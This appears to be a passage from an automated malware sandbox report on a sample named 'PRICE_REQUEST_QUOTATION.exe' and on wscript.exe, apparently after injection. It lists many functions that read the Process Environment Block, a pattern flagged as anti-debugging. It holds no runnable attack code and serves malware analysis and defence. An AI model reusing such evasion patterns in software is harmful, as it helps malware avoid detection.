Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A53884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A53884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A6B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A6B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A57016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A57016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A57016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009EB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00AA4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00AA4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A92073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00AA1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A061A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A061A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A569A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A551BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009FC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A02990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A641E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009DB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009DB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009DB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_00A0513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009D9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009D9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009D9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009F4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009FB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009FB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009DB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe	Code function: 3_2_009DB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D28CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D114FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C990AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C70050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C70050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D12073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D21074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D24015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D24015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D11C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D2740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D2740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D2740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D08DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CE41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C52D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C861A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C861A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C835A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C93D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C77D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D28D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C74120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C74120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C63D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C84D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C84D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C84D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CDA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D28ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C836CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C98EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D0FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C676E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C816E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CEFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C552A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D20EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D20EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D20EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C59240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C67E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CE4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6766D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D0B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D0B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D28A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C9927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C7AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C73A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D0FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C937F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C61B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C61B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D0D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C8B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04CD7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D1138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D25BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D28B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C5DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C6FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C83B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04C83B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 17_2_04D28F6A mov eax, dword ptr fs:[00000030h]
